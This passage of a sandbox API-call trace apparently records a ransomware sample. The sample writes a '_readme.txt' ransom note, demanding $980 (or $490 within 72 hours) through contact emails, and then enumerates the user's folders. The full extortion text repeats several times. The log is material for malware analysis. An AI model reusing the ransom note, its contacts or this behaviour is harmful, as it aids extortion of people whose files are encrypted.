hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.015] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced38 | out: hHeap=0x2c0000) returned 1 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.016] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.016] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01a8 [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0201.016] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0201.016] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.016] PathFindFileNameW (pszPath="") returned="" [0201.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced38 [0201.016] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.017] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.017] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b67060 [0201.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0201.017] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.017] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", pMore="_readme.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 1 [0201.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b158f8 [0201.017] PathFileExistsW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt") returned 0 [0201.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b67060 [0201.018] lstrcpyW (in: lpString1=0x3b67060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.018] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b16180 [0201.018] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\_readme.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0201.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3b65058 [0201.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x85b) returned 0x3b6ed68 [0201.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", cchWideChar=-1, lpMultiByteStr=0x3b6ed68, cbMultiByte=2139, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1", lpUsedDefaultChar=0x0) returned 1116 [0201.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b6f5d0 [0201.024] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned 1115 [0201.024] WriteFile (in: hFile=0x638, lpBuffer=0x3b6f5d0*, nNumberOfBytesToWrite=0x45b, lpNumberOfBytesWritten=0x39cfb64, lpOverlapped=0x0 | out: lpBuffer=0x3b6f5d0*, lpNumberOfBytesWritten=0x39cfb64*=0x45b, lpOverlapped=0x0) returned 1 [0201.026] CloseHandle (hObject=0x638) returned 1 [0201.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6f5d0 | out: hHeap=0x2c0000) returned 1 [0201.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b67060 | out: hHeap=0x2c0000) returned 1 [0201.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x32ced80 [0201.026] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cab400, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0201.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ced80 | out: hHeap=0x2c0000) returned 1 [0201.026] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x88cab400, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x88cab400, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0201.026] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x32f9250 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3310 | out: hHeap=0x2c0000) returned 1 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.027] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x32ef238 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.027] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x32e5198 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3208 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ef238 | out: hHeap=0x2c0000) returned 1 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3310 | out: hHeap=0x2c0000) returned 1 [0201.027] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0201.027] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0201.027] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2b98 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3470 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c34c8 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3208 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384518 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5198 | out: hHeap=0x2c0000) returned 1 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3310 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0201.028] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x1e057380, ftLastAccessTime.dwHighDateTime=0x1d60a66, ftLastWriteTime.dwLowDateTime=0x1e057380, ftLastWriteTime.dwHighDateTime=0x1d60a66, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3310 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x3b2fd8 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3208 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384518 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3520 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3578 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3470 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c34c8 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3368 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2b98 | out: hHeap=0x2c0000) returned 1 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c3368 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c3310 | out: hHeap=0x2c0000) returned 1 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0201.028] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd93ece20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xd93ece20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c32b8 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x76) returned 0x325fa0 [0201.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c32b8 | out: hHeap=0x2c0000) returned 1 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3845e8 [0201.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3845e8 | out: hHeap=0x2c0000) returned 1 [0201.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325fa0 | out: hHeap=0x2c0000) returned 1 [0201.029] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, 